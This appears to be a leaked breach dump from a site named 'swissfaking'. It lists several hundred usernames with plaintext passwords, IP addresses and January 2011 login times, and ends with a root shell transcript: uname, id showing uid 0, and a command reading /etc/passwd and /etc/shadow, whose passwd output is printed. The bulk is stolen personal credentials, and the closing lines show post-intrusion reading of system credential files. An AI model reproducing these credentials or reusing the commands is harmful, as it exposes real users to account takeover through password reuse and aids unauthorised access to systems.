hans-wurst:volkan95:92.76.11.157:January 2, 2011, 10:39 pm
knuff:111111:77.181.139.1:January 4, 2011, 4:51 pm
2slow4u:qWeRtZuIoP!"§$%&/()=?90:79.238.143.241:January 2, 2011, 10:29 pm
kenzoo:ganja:84.46.30.136:January 2, 2011, 9:05 pm
pascal1988:pacimaster:93.193.198.152:January 6, 2011, 4:47 pm
the|biggie:Qu<oyJv]Xc$gfd4k:62.224.132.166:January 2, 2011, 9:12 pm
cr4ck:iloveswiss:80.226.190.48:January 2, 2011, 9:41 pm
james:schulen:79.194.61.50:January 4, 2011, 2:40 pm
clx:fischer:88.74.186.72:January 2, 2011, 9:45 pm
bonbergol:Calabria:82.83.226.27:January 2, 2011, 9:53 pm
russka:connection:212.117.174.26:January 2, 2011, 9:07 pm
hiddencell:sfhc123!:94.220.165.4:January 2, 2011, 9:19 pm
rockz:laola123:77.0.211.178:January 3, 2011, 7:31 pm
rollmops:undesistghetto:92.241.165.69:January 3, 2011, 2:08 am
deinemudda:dickenberg:80.187.102.194:January 3, 2011, 4:07 pm
carsi93:sikicisemih93:91.60.76.140:January 5, 2011, 8:56 am
tricktrick_09:elyts123:188.195.241.141:January 3, 2011, 11:57 am
donnie:12344321:79.239.111.51:January 2, 2011, 10:50 pm
1llegal:zuhälter:188.107.121.32:January 2, 2011, 9:23 pm
freewolf:EliSSa1!:188.106.177.73:January 4, 2011, 12:36 am
cobega:you64control:95.143.192.159:January 4, 2011, 12:09 am
lan-kabel:rchbpf1567kb5q1337yo:94.216.194.53:January 2, 2011, 9:54 pm
nightwalker:123123:87.153.145.248:January 5, 2011, 7:57 pm
luca:Reiterbogen01:95.143.192.159:January 2, 2011, 9:41 pm
dr.med.den.rasen:Google.de/12:77.3.161.91:January 5, 2011, 6:37 pm
lynex:a1zb9ky95:178.199.76.95:January 3, 2011, 5:04 pm
boterkid:147896325:95.89.159.72:January 2, 2011, 10:08 pm
cangria:Ch4xt0r11:92.241.184.61:January 6, 2011, 1:54 am
me.:sa06bi02ne:84.60.186.200:January 2, 2011, 11:14 pm
sidneyland:sidney12:87.165.220.205:January 3, 2011, 3:27 am
badboypole:rapidsharehp1:212.117.162.192:January 3, 2011, 2:40 pm
racketeer:neumsche:95.211.99.91:January 2, 2011, 10:44 pm
hearts:deutschland:212.117.172.231:January 6, 2011, 1:30 am
jaro:ichstinke:80.140.2.165:January 5, 2011, 1:19 am
mehmet14:hass:89.13.128.117:January 2, 2011, 10:05 pm
eldiablo:eldiablo315:78.42.155.69:January 3, 2011, 8:51 pm
dv1980:dv19801980:84.44.191.37:January 6, 2011, 8:31 pm
ppp:jockel)!"//:80.226.20.125:January 4, 2011, 11:10 am
delirion:gericom:87.118.120.182:January 3, 2011, 10:36 pm
h3c70r:julia1337*:95.89.153.7:January 3, 2011, 6:01 am
blacki:13371337:87.123.146.89:January 3, 2011, 11:19 am
chiko:yarakmarie:92.76.254.240:January 3, 2011, 1:08 am
nookiey00:scene123:93.201.204.220:January 2, 2011, 10:43 pm
kdkdkd:7UKpQ$ü0:85.177.151.43:January 2, 2011, 10:22 pm
bloody:faq4m2swiss:86.56.41.39:January 2, 2011, 9:47 pm
typ:Klasfu23980asfnkla9sf8halskgansg25g:84.186.61.95:January 2, 2011, 9:21 pm
mortalcookie:8Nj6aAh5(=):91.18.231.18:January 2, 2011, 9:05 pm
paloxus:Hallo123:89.217.44.141:January 4, 2011, 9:50 pm
edd18:Oceansday090291qw:88.134.175.46:January 2, 2011, 9:28 pm
wounder:Deneme^92:88.74.100.221:January 5, 2011, 3:29 pm
impaled:rap3isfun:79.233.199.226:January 3, 2011, 1:52 am
siek:hallohallo:77.186.96.171:January 2, 2011, 9:05 pm
terror:PureHate.030:95.89.47.120:January 6, 2011, 11:36 pm
ra-re:ujmko44:93.231.130.78:January 3, 2011, 5:36 pm
hotfuzz:C1V2X3:80.136.162.78:January 2, 2011, 10:31 pm
heins12:JanQ!W"E§R$jan:62.143.165.130:January 3, 2011, 12:17 am
psychosomasis:ts450245622:95.223.105.235:January 3, 2011, 9:27 am
mixer:@:s9#Ze;L61MXZT=,"RRS:L>j`,}} :213.232.200.177:January 3, 2011, 7:30 pm
pandora:nokia6280:84.61.88.65:January 2, 2011, 10:36 pm
fenriz187:gelomyrtol:92.225.202.186:January 6, 2011, 8:09 pm
tezeewood:26nu4uku26nu4uku$:109.91.113.26:January 2, 2011, 9:16 pm
china:§k$vf@n1:81.210.136.47:January 2, 2011, 11:54 pm
ibrains:qw2io0pl:46.115.102.70:January 2, 2011, 9:29 pm
rox:rox24255:80.122.42.30:January 3, 2011, 11:45 pm
slash:keinproblem15:83.135.112.150:January 3, 2011, 1:21 am
punisher:youtube26:85.180.135.133:January 2, 2011, 11:27 pm
lolboter:EsPZLtQa2x=9Mf@I:80.171.11.252:January 5, 2011, 11:55 pm
fasti1001:lasterraster:77.20.136.173:January 4, 2011, 11:22 am
d0pz:lollollol123miregal95:213.163.64.43:January 2, 2011, 11:48 pm
tolja:fujitsusiemens22:91.61.147.49:January 2, 2011, 11:55 pm
solt:lolgolol:95.143.192.159:January 2, 2011, 9:09 pm
beex:ab1cd2:91.89.190.46:January 2, 2011, 9:56 pm
pimperich:M1YgRgXB:79.228.118.129:January 3, 2011, 10:28 am
curly:Eminem:79.193.89.45:January 2, 2011, 10:10 pm
jasmin75:yId69xqsmBve:87.150.137.16:January 2, 2011, 9:29 pm
justmike:t3xxe33:84.168.231.191:January 2, 2011, 10:10 pm
du3en:kjxxdj13:92.73.69.139:January 2, 2011, 11:00 pm
dr.bob:Swissfaking2011:84.61.238.224:January 2, 2011, 10:13 pm
prototype:matrix:46.126.244.198:January 3, 2011, 2:13 am
winkelmann72:jonaskiessling:89.208.35.190:January 2, 2011, 10:03 pm
tollik:audi80:93.205.10.77:January 2, 2011, 9:43 pm
cybi0nic:67k57eiSswissfaking:93.182.171.109:January 3, 2011, 4:10 pm
wuschi:fetterJaxel:82.83.42.21:January 3, 2011, 8:26 am
juan:55555:217.23.6.162:January 3, 2011, 6:24 pm
fusselpo:schatz11:77.22.240.27:January 4, 2011, 10:00 pm
nomercy:ymZZIFIF0nCZZ$BW:62.143.126.35:January 2, 2011, 9:26 pm
jamyla:2wsx6zhn:93.217.241.134:January 6, 2011, 5:33 pm
nemiz:2z3545:94.220.79.39:January 4, 2011, 11:47 pm
theird21:kmk00025879:217.88.114.20:January 2, 2011, 11:11 pm
corvu5:corvu54swissfaking:95.222.116.238:January 2, 2011, 10:13 pm
s0xtech:s0xy0000:217.231.252.159:January 2, 2011, 9:39 pm
speedygamer:Nzhdtlcwb1:89.149.242.16:January 3, 2011, 12:39 am
die-wiese:Ventura83:188.193.8.225:January 3, 2011, 12:47 pm
goldrock:56&6ght$$!awwEfb:62.167.138.232:January 2, 2011, 10:48 pm
devilboy:pelubo62:87.106.94.167:January 4, 2011, 3:04 pm
fam0us:ichliebedich1:92.241.168.24:January 2, 2011, 10:49 pm
ares:mmmmmmmmm:80.108.172.227:January 5, 2011, 9:48 pm
imer:misakifan:93.217.127.220:January 2, 2011, 9:48 pm
secdaking:$p!tT3r2k!0:79.211.101.154:January 3, 2011, 12:36 am
seriousman:regen@44:79.203.222.236:January 2, 2011, 11:08 pm
mpcool:famous:77.183.227.158:January 3, 2011, 5:13 pm
sine:ninaninabekim:79.197.201.62:January 2, 2011, 10:14 pm
famous:aLq3lm$%:92.241.190.253:January 2, 2011, 10:29 pm
psych0:achtzehn32:79.204.163.237:January 3, 2011, 3:41 pm
trickz:crazyfrog1234:87.118.118.37:January 2, 2011, 9:27 pm
pseudo:hackedbypseudo:78.48.103.103:January 2, 2011, 9:45 pm
n00be:kjvhjvhjhvmvh:92.241.190.253:January 2, 2011, 10:11 pm
txto:123456:88.67.188.148:January 3, 2011, 2:17 am
mehmet111:hahaka:66.90.73.223:January 3, 2011, 4:28 am
daemon:weed1337:84.149.94.90:January 3, 2011, 6:45 pm
sugar:xip6hexi0:217.91.210.243:January 4, 2011, 9:12 am
dextrose:.l33rlauf:92.241.168.90:January 2, 2011, 11:04 pm
weareone:Ichwurdeam23.07.1994geboren.:212.117.174.26:January 2, 2011, 9:49 pm
fatalerror:pulamea18:88.117.121.105:January 4, 2011, 2:39 pm
devolo:PT1346798522!:93.130.53.175:January 2, 2011, 10:14 pm
lestat:123456:79.236.62.169:January 3, 2011, 4:30 pm
zahlenpilz:hacksector:92.77.4.189:January 3, 2011, 9:33 pm
ivenom:1337s!lenTxD:87.143.216.239:January 2, 2011, 9:45 pm
stegen:daniel:188.194.83.146:January 6, 2011, 4:54 pm
ch4in:1384gwm123:217.187.138.90:January 3, 2011, 12:14 am
hesgoodboy:01724186115:217.114.211.242:January 3, 2011, 1:30 pm
michi:äöüäöü:91.42.237.242:January 2, 2011, 9:14 pm
lazarus:Google123:85.178.160.144:January 2, 2011, 9:30 pm
paran0id:bravsobrav:212.117.160.22:January 2, 2011, 9:01 pm
simul4nt:comnoboat:109.192.198.159:January 3, 2011, 12:23 am
dicethrower:12wue345rfe6l:212.23.103.26:January 3, 2011, 2:35 pm
raydo:h3llboy:93.208.239.102:January 4, 2011, 12:04 am
janus:vladimir:92.107.113.49:January 2, 2011, 10:49 pm
crankrex:monohydrat:95.89.188.29:January 3, 2011, 7:17 pm
paradox:BTYM8h:92.241.168.90:January 2, 2011, 9:25 pm
bluehero:1qay2wsx:84.138.178.123:January 2, 2011, 11:50 pm
nobody:pagewrapper:83.170.114.16:January 6, 2011, 12:06 am
freakout:Ghana11:178.200.60.53:January 4, 2011, 10:35 pm
loop:1337loopi:78.48.162.155:January 4, 2011, 9:44 am
phr34kz:UX3eXfSzZ5q7N0{:212.117.162.222:January 2, 2011, 9:19 pm
hoodstar:lieblingssarah271994:78.50.94.114:January 4, 2011, 12:45 am
alphahack:alphahack:188.108.81.215:January 3, 2011, 11:59 pm
silence:8530ch:91.65.94.151:January 2, 2011, 9:16 pm
christian:123456:78.42.172.154:January 2, 2011, 10:05 pm
batonde:gDHoCJHG-6*Ae1Lj:88.73.87.81:January 6, 2011, 7:38 pm
jokereloaded:stefan1337!:217.225.87.229:January 3, 2011, 11:22 am
oneone1:BVBBERKY212:91.33.186.9:January 3, 2011, 3:34 pm
vodka:159ZAYCXS792QUALIAdRO//:217.255.207.169:January 2, 2011, 9:25 pm
killermouse:kiffer:78.55.117.164:January 3, 2011, 11:26 pm
run.:duschlampen!1:79.194.93.91:January 3, 2011, 9:45 pm
1337_reaction:1002003000:92.241.165.69:January 2, 2011, 9:55 pm
king6545:Soh2vebo333:178.203.138.49:January 4, 2011, 11:31 pm
basics:nicki123!:91.67.60.117:January 2, 2011, 9:03 pm
deco:julian08:178.202.239.33:January 2, 2011, 9:38 pm
ricardiazz:swissfaking:89.13.14.5:January 2, 2011, 9:16 pm
delax:hackerfun:188.193.194.86:January 2, 2011, 9:11 pm
jamesfb:fenerbahce:94.221.91.129:January 2, 2011, 10:43 pm
icebox87:apfel23:79.253.148.110:January 3, 2011, 1:50 pm
tryit:187lalalala187#:88.70.196.173:January 2, 2011, 11:46 pm
mrk:422mark646:62.178.8.56:January 3, 2011, 12:43 am
peter_pan:2bon2b:62.143.149.223:January 6, 2011, 9:33 am
tweaknap:%$HD1337PS$%:178.142.84.178:January 3, 2011, 12:11 am
nokz:aufleg0rn:92.227.68.28:January 3, 2011, 8:33 am
shoxx:g07091992:92.74.162.228:January 3, 2011, 4:34 pm
edgeee:za32qt4s.:80.201.55.194:January 3, 2011, 2:15 pm
w.t.f.:lol123:217.226.243.83:January 3, 2011, 11:06 pm
d3rd0n:12cocsli:93.217.26.178:January 3, 2011, 2:52 am
sp33djunkie:17331733:212.117.162.222:January 2, 2011, 9:24 pm
infomailer:9ö7&4k.ü_ä VmSH.NmwD:77.23.8.178:January 2, 2011, 10:01 pm
nesia:Nummer13Lebt!!!:82.82.167.173:January 4, 2011, 11:13 am
nyuu:123456789:87.122.143.30:January 2, 2011, 10:03 pm
selix:Bitrate187:188.192.238.47:January 3, 2011, 12:09 pm
smithz:Sarah1988:92.241.190.253:January 3, 2011, 1:40 am
ryl666:lolomg123:83.216.241.77:January 2, 2011, 10:20 pm
boardmaster2010:16052009:78.55.59.70:January 3, 2011, 9:06 pm
siverman:276910:77.187.55.123:January 3, 2011, 2:03 pm
deathnote:Shinigami1:91.113.13.4:January 3, 2011, 5:19 pm
ghostt:qawsed:95.128.242.224:January 6, 2011, 3:11 am
kingmail:1qay2wsx3edc4rfv:79.209.8.113:January 3, 2011, 2:40 pm
xxlegendaxx:123234:89.217.150.18:January 3, 2011, 11:25 am
ndtbit:ndtbit7:80.146.17.64:January 3, 2011, 1:33 am
anno:valerka:90.136.45.75:January 4, 2011, 8:04 pm
garrisson:hallo123:92.106.62.29:January 3, 2011, 12:45 pm
spitfir3:012345:93.232.245.248:January 6, 2011, 12:41 pm
z0mg:hitler123456:77.23.89.32:January 3, 2011, 4:18 am
prisma:dasydasy15:87.166.73.53:January 3, 2011, 11:31 pm
itunes:edu123hil:24.170.79.116:January 3, 2011, 10:55 pm
leopard:teufeline<3swiss:213.163.64.43:January 2, 2011, 9:35 pm
m00n:berlin123:188.193.230.70:January 2, 2011, 9:51 pm
danemone:danemonekoklopspocicdvbt:92.241.168.24:January 4, 2011, 2:39 am
rolf32:fickmich069:213.163.65.50:January 2, 2011, 10:49 pm
accoli:hallo123:80.80.246.188:January 4, 2011, 11:23 am
st0re:123456:109.193.140.236:January 3, 2011, 4:22 pm
wrigleys:schwippschwapp999:93.192.161.49:January 2, 2011, 9:28 pm
jigga666:159951baumheide123:109.90.93.220:January 2, 2011, 11:42 pm
sar:6%$45De§$wER:92.231.164.131:January 3, 2011, 12:40 am
deffjeff:30111970:94.219.18.179:January 4, 2011, 1:48 pm
playa_:1abc23z1:217.248.142.13:January 2, 2011, 9:54 pm
cy0n!x:55de!xz7:178.3.205.85:January 4, 2011, 4:31 pm
mc_wrei:fiona2:84.75.38.254:January 3, 2011, 8:49 pm
br0unce:!$spainyswiss$:85.214.39.134:January 2, 2011, 9:00 pm
saxas:6bhy&#nVKenahwLU7oj6WzD&JA%ZnT:89.217.182.32:January 2, 2011, 9:35 pm
peevee:aimer89:78.50.91.135:January 3, 2011, 2:45 am
mark21:wiesonicht:217.248.156.69:January 3, 2011, 12:22 am
keks:Rof1rwe88$:178.1.51.57:January 3, 2011, 1:52 pm
cyborgx:dihodo62:91.50.105.196:January 3, 2011, 2:15 am
tomdanger:gogogo123:92.241.168.24:January 2, 2011, 9:34 pm
logg23:koruku11:91.48.156.95:January 2, 2011, 9:35 pm
inferior:210340:91.113.110.183:January 4, 2011, 2:56 pm
djinn:m28h611!:109.90.88.103:January 3, 2011, 8:05 pm
fred777:swissfaking.6x.toto:91.17.194.74:January 3, 2011, 1:22 am
w00dka:technobase1337:91.7.224.30:January 2, 2011, 10:51 pm
achmatov:hansdieter1:87.148.16.206:January 2, 2011, 11:51 pm
acidraining:$@cidr@ining$:95.208.135.191:January 3, 2011, 12:56 am
h0us3:josiaistschwarz:85.25.184.102:January 2, 2011, 9:10 pm
franky:Franky12345678909*:212.117.172.231:January 2, 2011, 9:16 pm
blueye:gnomi1337:202.60.66.32:January 3, 2011, 5:04 pm
chillerdady:K@t0LiDoR:87.181.209.28:January 3, 2011, 12:28 am
flash:nx6200ax:217.94.255.158:January 2, 2011, 11:59 pm
kuku:kuhfrosch123:79.242.127.235:January 3, 2011, 5:45 pm
mr.ru:kaik88ka:92.241.165.69:January 4, 2011, 1:56 am
n!sk:madonna119:95.143.192.190:January 2, 2011, 10:31 pm
kk3kk:Soundzz12:78.54.51.234:January 3, 2011, 3:07 am
raupi419:klISDMoVPNycc6zYnvLw3CaG:46.126.220.35:January 2, 2011, 9:31 pm
binary:sänger44:178.238.142.242:January 2, 2011, 11:41 pm
blu3cod3:lj49:93.220.25.103:January 5, 2011, 1:04 pm
armizor:qwerdxyas1234:91.48.104.120:January 3, 2011, 5:06 pm
zerox:Einfach-111:79.229.219.110:January 2, 2011, 10:36 pm
n0ise:Malle09*geil!!:212.117.165.197:January 3, 2011, 12:53 am
hard$tyler:martin55:92.241.190.253:January 6, 2011, 1:03 pm
ezel:enbüyükallah:85.177.167.57:January 2, 2011, 10:01 pm
spacejovi:Sara06.10:81.173.147.225:January 2, 2011, 9:25 pm
kingsize89:lesane25121989:78.42.183.79:January 2, 2011, 11:12 pm
sushi:SmokingGras:79.197.71.162:January 5, 2011, 11:05 pm
joe:12345asd:213.163.65.50:January 5, 2011, 4:08 pm
syntex:knallfrosch221:93.212.172.91:January 4, 2011, 10:55 am
afroman:JGMlms91:94.220.85.64:January 3, 2011, 4:27 am
master2k:5e4d3c2b1a:212.117.165.197:January 3, 2011, 12:07 pm
inex:coldmaster1337:93.82.245.122:January 5, 2011, 3:40 pm
smile:saufen123456:89.204.137.180:January 2, 2011, 11:05 pm
cch:anit77:93.232.245.48:January 6, 2011, 12:38 am
ziiieper:Computermausi21:188.100.191.130:January 2, 2011, 9:01 pm
moses908:161286:178.142.75.51:January 3, 2011, 3:17 am
sensemann88:10051964:79.248.91.90:January 6, 2011, 3:52 pm
eddy:aspirine:92.203.35.1:January 4, 2011, 5:54 pm
kugelblitz:WaBaXLx1:93.212.129.172:January 3, 2011, 8:20 pm
jamesdean:1qwerbeet:93.217.25.62:January 3, 2011, 4:32 pm
m0nic:IbebLadJ1993 #!:87.118.120.182:January 2, 2011, 9:24 pm
insame:crunk1994:88.67.124.238:January 2, 2011, 9:07 pm
psychoink:l*8R&t3CpgW6rw5z5H:82.82.217.166:January 3, 2011, 1:18 pm
jaroslav:ramona6305600:87.189.172.31:January 2, 2011, 9:20 pm
reto:dragon11:77.194.252.92:January 4, 2011, 4:20 pm
xerox:D#fqh88jb:89.182.159.187:January 2, 2011, 11:09 pm
gamerfis:$&%?ZJ94:85.176.78.21:January 2, 2011, 11:14 pm
nko:password:nox:87.173.185.216:January 3, 2011, 12:31 pm
yaboybigt:=-_})-=0:81.210.167.79:January 3, 2011, 5:11 am
bonx:bubu1818:89.204.153.167:January 4, 2011, 1:54 pm
dogma:walkthelineswiss:92.106.249.125:January 3, 2011, 1:24 am
ratzi:lusenheide:109.91.140.55:January 7, 2011, 12:33 am
3p!cf4!l:tele2sux:92.241.165.69:January 5, 2011, 2:55 pm
nagilum:gilgamesch1415926535:84.19.169.234:January 2, 2011, 9:28 pm
3dr:leeroyjenkins:84.59.162.27:January 2, 2011, 11:22 pm
erazorx8:ficken:92.225.129.75:January 4, 2011, 6:32 pm
mopedfahrer:mozilla006:84.19.169.162:January 5, 2011, 10:46 pm
darookie:Pr0d1gyThe:87.159.47.180:January 3, 2011, 12:08 am
paranoid:crbahP962P:91.66.225.130:January 3, 2011, 6:10 pm
devil234:R/m<7ctN&AEr<TF;@zg$:80.108.246.5:January 3, 2011, 2:04 pm
miro:lollollol:94.79.189.112:January 2, 2011, 9:05 pm
apocalypsee:dielupe:84.19.169.162:January 6, 2011, 5:17 am
managarm:chris16:217.237.95.167:January 2, 2011, 11:39 pm
supporter:sniFFerg56:84.168.214.42:January 4, 2011, 1:29 am
razr:225-xdA6225-xdA6:213.186.121.4:January 3, 2011, 5:01 pm
zap:s5hfQdBKWJ:69.164.192.139:January 2, 2011, 9:25 pm
craig:123456:93.245.172.207:January 3, 2011, 12:31 pm
xam4:meins1234:79.240.184.187:January 2, 2011, 9:52 pm
weedstar:1231231231337:82.195.232.218:January 3, 2011, 2:54 am
rotefahne:pw&Gzz%r%uZsr:188.102.220.242:January 3, 2011, 11:09 pm
holzmen:FJhEIh$=g/G(Rkg\7F4Z:82.195.232.218:January 2, 2011, 9:17 pm
burner:stick4you11:82.113.121.144:January 3, 2011, 12:18 am
c-klasse:chbchb:79.197.208.32:January 4, 2011, 3:25 pm
tahirciq:LC8U.J&yY$/-Atdd:78.35.128.157:January 3, 2011, 12:00 pm
locke:14041987:85.176.206.32:January 3, 2011, 6:49 am
yahomie:Killer7:212.117.163.21:January 5, 2011, 7:57 pm
threexcp:g@ngster@ushh1!:78.54.26.103:January 2, 2011, 9:29 pm
rocker:kleinermann:79.202.35.85:January 2, 2011, 11:03 pm
dudelmaster:Willy10715!:91.51.111.78:January 2, 2011, 9:55 pm
sh4k4l88:12345654321:92.241.165.69:January 2, 2011, 10:18 pm
triggertravis:handball:79.220.232.154:January 3, 2011, 1:02 am
schakal:asdfgh:188.193.148.29:January 4, 2011, 8:29 pm
pogogirl1922:farcry:217.226.116.191:January 3, 2011, 9:08 pm
bierbauer:marius1475963:92.200.0.168:January 3, 2011, 1:02 am
el!t3:ficken123!:195.254.134.10:January 2, 2011, 9:21 pm
logitech551:skmasteresl:188.60.230.19:January 2, 2011, 9:16 pm
darkar:passwort:93.232.249.46:January 3, 2011, 4:31 pm
jimbeam:jimbeam:78.42.66.80:January 2, 2011, 9:41 pm
nazgul19:michael:88.153.2.184:January 5, 2011, 8:46 pm
nexus88:01230123:80.131.83.133:January 3, 2011, 4:00 am
shade:1qaz2ws:84.137.122.147:January 2, 2011, 9:24 pm
wowww:hallo123456789:80.142.199.29:January 2, 2011, 9:08 pm
?fragezeichen?:1q2w3e4r--:87.146.201.33:January 4, 2011, 12:27 pm
krime:yalayala:80.143.17.206:January 4, 2011, 12:08 pm
dlite:payne91:93.209.31.60:January 4, 2011, 4:31 pm
root:peterpan:87.154.115.107:January 5, 2011, 7:53 pm
inf3ct3d:Linkin1Linkin12:88.75.22.107:January 3, 2011, 4:59 pm
starz:123123:41.202.95.240:January 2, 2011, 9:34 pm
ikas:k7gh8uc3ph:77.11.2.14:January 2, 2011, 9:04 pm
normasell:psjDjdsr:213.186.121.4:January 2, 2011, 10:54 pm
asdf-one:asdfjklö:92.241.168.196:January 6, 2011, 2:06 am
hacksyndrom:dubastard!!:94.220.218.178:January 2, 2011, 9:50 pm
ashame:snatschi88:62.143.177.224:January 4, 2011, 4:29 pm
cyber-----dance:hdgdla:92.241.165.69:January 3, 2011, 11:22 pm
slyfar:123321:87.179.68.246:January 3, 2011, 9:28 pm
sutekh:SA/DZ)(AZD8za9sdz97AZSD/)(azsd:195.254.134.194:January 3, 2011, 6:34 pm
noob@pc:12345:94.216.12.141:January 4, 2011, 8:57 am
bloodyloody:123456:91.58.69.21:January 5, 2011, 12:52 pm
stay:sic:ricco123:92.75.239.233:January 3, 2011, 5:41 pm
armageddon:Dmre6PJH:93.217.26.195:January 2, 2011, 9:31 pm
taironbc:leet1337:188.98.230.183:January 2, 2011, 9:37 pm
haze50:streetshok50:89.204.153.130:January 3, 2011, 10:19 pm
king18:meradil18:90.136.196.113:January 2, 2011, 11:35 pm
bonnie:A131839k:89.217.13.29:January 5, 2011, 5:44 pm
anilman:col123456:46.5.147.97:January 3, 2011, 4:12 am
wh!t3-sh33p:['H']4xOR!?:217.23.6.162:January 2, 2011, 10:01 pm
nightyshine:oni-link:91.44.169.222:January 5, 2011, 10:25 am
1067riddick:fuckyou123:86.56.44.88:January 3, 2011, 12:00 am
kingof:0VYGSLda9vpD:89.236.172.149:January 3, 2011, 6:35 pm
hkg44:cracker44:2.210.65.152:January 2, 2011, 9:54 pm
ultra:lollol:84.60.213.70:January 3, 2011, 6:19 pm
hans:A2f5V26f55F2v6s2d1f2s3cF:178.239.51.80:January 3, 2011, 1:27 pm
stevy:berlin123:91.64.195.245:January 3, 2011, 12:10 pm
mrmandato:qwqwqwqw1:188.108.51.104:January 3, 2011, 5:23 pm
rave:3Wur7CeiRZ2g25nNUmmk:178.239.51.80:January 3, 2011, 4:44 pm
kassur:Freak1990.:91.4.51.142:January 2, 2011, 9:16 pm
sc0field:3cult0r:84.158.49.55:January 3, 2011, 1:44 am
czok:dogdog:178.26.76.90:January 2, 2011, 9:02 pm
royalus:silvas4436:92.241.190.253:January 2, 2011, 11:15 pm
s.ibrahimovic:PorscheCayenne350:92.241.168.24:January 3, 2011, 1:59 pm
ixxten:passwort001sirboss001:212.117.162.222:January 2, 2011, 9:05 pm
ninjai:ramona62:95.208.33.97:January 3, 2011, 2:57 pm
ghettolive:rexangel1:79.197.208.159:January 3, 2011, 7:36 pm
elkasino:mentos123:81.210.229.154:January 2, 2011, 10:11 pm
naik:c13g4:80.136.48.37:January 3, 2011, 12:20 am
hephaistos:android3:217.87.198.35:January 2, 2011, 10:31 pm
skywalker:02662650:91.19.122.142:January 5, 2011, 5:40 pm
back_space:timpfaff:92.241.168.196:January 6, 2011, 2:11 am
leetcru:cocacola22:188.194.106.119:January 3, 2011, 2:42 pm
m18:trustno02:188.103.64.45:January 2, 2011, 9:58 pm
cypress:qLLij#iW:hZeE:!Y:178.39.186.63:January 2, 2011, 9:03 pm
legend:666199:88.64.128.12:January 3, 2011, 3:35 am
coastar:computer1212:93.135.175.210:January 5, 2011, 10:25 pm
hustler71:88108810:46.115.15.139:January 3, 2011, 10:17 am
eisernegarde:silvio0603:88.70.73.27:January 2, 2011, 9:58 pm
panno:fJZj471W:79.198.146.95:January 5, 2011, 10:00 pm
iocn:kirsehir?93:92.201.12.138:January 2, 2011, 9:19 pm
triple:3WEXGAPu:93.190.142.49:January 3, 2011, 2:16 pm
marco88:deutschland:94.134.31.40:January 5, 2011, 3:00 pm
adapter:grundlosigkeit:82.113.121.145:January 2, 2011, 10:25 pm
fakebaba!:monster2206:95.118.64.250:January 6, 2011, 10:32 pm
snap:ilker007:94.216.12.44:January 3, 2011, 5:35 pm
backslash:m1e2dion12345:79.217.153.191:January 2, 2011, 9:43 pm
boki-plati:borislavmilakovic8810horgen:84.227.119.100:January 2, 2011, 9:47 pm
ayran:!crimeisking!:77.180.11.5:January 3, 2011, 2:24 pm
al--big--al:1paypal1:212.23.105.246:January 2, 2011, 9:37 pm
afghanistan:dJKX8TRF:92.226.129.104:January 5, 2011, 3:37 am
cunit156:spermaschleuder:92.241.190.253:January 2, 2011, 10:27 pm
cutsman:hors3th3:69.172.133.147:January 4, 2011, 1:47 pm
fr33m4n:nordschleife89:93.208.75.195:January 2, 2011, 9:14 pm
samsung.no1:gtasanandreas:85.177.156.146:January 2, 2011, 11:22 pm
wacked:N3U35P4$$VV0RD_swissfaking:79.243.167.120:January 3, 2011, 2:32 pm
habbo:colajayswiss:213.232.200.195:January 3, 2011, 7:39 am
long:fÖ5XTfTO0^3YXdbNUr:109.193.89.249:January 2, 2011, 9:16 pm
neocrow:df54!"§$31SD3F1"3"AY§$"!/(:79.218.181.195:January 2, 2011, 9:44 pm
d3adline:megaman2:95.211.13.145:January 2, 2011, 9:18 pm
devil589:devil555:77.180.235.152:January 6, 2011, 3:58 am
knucklez:swiss4ever:84.119.59.21:January 6, 2011, 4:21 pm
1.zocker:12.fifazocker09:178.203.169.75:January 2, 2011, 10:02 pm
loptr:08NmKF8syW:88.66.6.247:January 3, 2011, 2:45 am
chikanooo:CTVX(X):78.42.38.129:January 5, 2011, 10:40 pm
binglly:16211621:77.37.202.47:January 2, 2011, 10:18 pm
revance:sardarmohd:91.7.139.59:January 2, 2011, 11:37 pm
albohak92:jehonatedua:178.203.2.169:January 3, 2011, 11:13 am
player:iphone123:188.99.245.233:January 2, 2011, 9:33 pm
smooch:polen1337:62.143.150.247:January 2, 2011, 9:30 pm
spast08:as132dog184:188.194.117.251:January 4, 2011, 11:32 pm
bobwaly:project-electro:91.41.66.5:January 3, 2011, 5:29 pm
rabbit:onedollar12:93.190.142.49:January 3, 2011, 4:20 pm
profihackeur_:schneewitschen1992:79.253.33.181:January 2, 2011, 11:48 pm
slashx:6gunsnroses9:188.194.33.146:January 3, 2011, 3:36 pm
k-starrr:rahsan:188.195.1.169:January 2, 2011, 9:01 pm
lovetechno:pooltime:89.182.143.105:January 2, 2011, 9:17 pm
breez:fm49vi2dl0:95.128.242.224:January 2, 2011, 10:45 pm


# uname -a
Linux swissfaking 2.6.18-164.11.1.el5.028stab068.5 #1 SMP Mon Mar 15 19:26:36 MSK 2010 i686 athlon i386 GNU/Linux

# id
uid=0(root) gid=0(root)

# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
nouser:x:500:500::/home/nouser:/sbin/nologin
lxlabs:x:501:501::/home/lxlabs:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
